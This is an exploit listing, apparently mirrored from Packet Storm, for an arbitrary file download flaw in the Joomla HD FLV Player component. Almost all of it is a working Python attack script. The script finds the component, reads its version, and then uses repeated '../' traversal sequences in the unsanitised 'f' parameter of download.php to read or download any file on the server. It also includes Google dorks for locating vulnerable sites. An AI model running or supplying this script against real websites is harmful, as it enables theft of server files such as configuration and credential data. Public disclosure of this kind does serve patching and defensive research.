Joomla HD FLV 2.1.0.1 Arbitrary File Download

🗓️ 17 Nov 2014 00:00:00Reported by Claudio VivianiType
packetstorm🔗 packetstormsecurity.com👁 27 Views
Joomla HD FLV 2.1.0.1 Arbitrary File Download Vulnerability. Exploits unsecure "f" variable allowing arbitrary file download
`#!/usr/bin/env python  
#  
# Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability  
#  
# Exploit Author : Claudio Viviani  
#  
# Vendor Homepage : http://www.hdflvplayer.net/  
#  
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5  
#  
# Dork google 1: inurl:/component/hdflvplayer/  
# Dork google 2: inurl:com_hdflvplayer   
#  
# Date : 2014-11-11  
#  
# Tested on : BackBox 3.x/4.x  
#  
# Info:   
# Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=  
# The variable "f" is not sanitized.  
# Over 80.000 downloads (statistic reported on official site)  
#  
#  
# Video Demo: http://youtu.be/QvBTKFLBQ20  
#  
#  
# Http connection  
import urllib, urllib2  
# String manipulation  
import re  
# Time management  
import time  
# Args management  
import optparse  
# Error management  
import sys  
  
banner = """  
_______ __ ___ ___ ______  
| _ .-----.-----.--------| .---.-. | Y | _ \\  
|___| | _ | _ | | | _ | |. 1 |. | \\  
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \\  
|: 1 | |: | |: 1 /  
|::.. . | |::.|:. |::.. . /  
`-------' `--- ---`------'  
_______ ___ ___ ___ _______ __  
| _ | | | Y | | _ | .---.-.--.--.-----.----.  
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|  
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|  
|: | |: 1 |: 1 | |: | |_____|  
|::.| |::.. . |\:.. ./ |::.|  
`---' `-------' `---' `---'  
  
<= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d  
  
Written by:  
  
Claudio Viviani  
  
http://www.homelab.it  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
"""  
  
# Check url  
def checkurl(url):  
if url[:8] != "https://" and url[:7] != "http://":  
print('[X] You must insert http:// or https:// procotol')  
sys.exit(1)  
else:  
return url  
  
  
def checkcomponent(url,headers):  
  
try:  
req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)  
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")  
print("")  
except urllib2.HTTPError:  
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")  
sys.exit(1)  
except urllib2.URLError:  
print '[X] Connection Error'  
  
def checkversion(url,headers):  
  
try:  
req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)  
response = urllib2.urlopen(req).readlines()  
  
for line_version in response:  
  
if not line_version.find("<version>") == -1:  
  
VER = re.compile('>(.*?)<').search(line_version).group(1)  
  
sys.stdout.write("\r[+] Checking Version: "+str(VER))  
print("")  
  
except urllib2.HTTPError:  
sys.stdout.write("\r[+] Checking Version: Unknown")  
  
except urllib2.URLError:  
print("\n[X] Connection Error")  
sys.exit(1)  
  
def connection(url,headers,pathtrav):  
  
char = "../"  
bar = "#"  
s = ""  
barcount = ""  
  
for a in range(1,20):  
  
s += char  
barcount += bar  
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)  
sys.stdout.flush()  
  
try:  
req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)  
response = urllib2.urlopen(req)  
  
content = response.read()  
  
if content != "" and not "failed to open stream" in content:  
print("\n[!] VULNERABLE")  
print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)  
print("")  
print("[+] Do you want [D]ownload or [R]ead the file?")  
print("[+]")  
sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")  
  
download = set(['d'])  
read = set(['r'])  
  
while True:  
choice = raw_input().lower()  
if choice in download:  
filedown = pathtrav.split('/')[-1]  
urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)  
print("[!] DOWNLOADED!")  
print("[!] Check file: "+filedown)  
return True  
elif choice in read:  
print("")  
print content  
return True  
else:  
sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")  
  
except urllib2.HTTPError:  
#print '[X] HTTP Error'  
pass  
except urllib2.URLError:  
print '\n[X] Connection Error'  
  
time.sleep(1)  
print("\n[X] File not found or fixed component :(")  
  
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')  
commandList.add_option('-t', '--target', action="store",  
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",  
)  
commandList.add_option('-f', '--file', action="store",  
help="Insert file to check",  
)  
options, remainder = commandList.parse_args()  
  
# Check args  
if not options.target or not options.file:  
print(banner)  
commandList.print_help()  
sys.exit(1)  
  
print(banner)  
  
url = checkurl(options.target)  
pathtrav = options.file  
  
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}  
  
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")  
checkcomponent(url,headers)  
sys.stdout.write("\r[+] Checking Version: ")  
checkversion(url,headers)  
sys.stdout.write("\r[+] Exploiting...please wait:")  
connection(url,headers,pathtrav)  
`
17 Nov 2014 00:00Current
0.2Low risk
Vulners AI Score0.2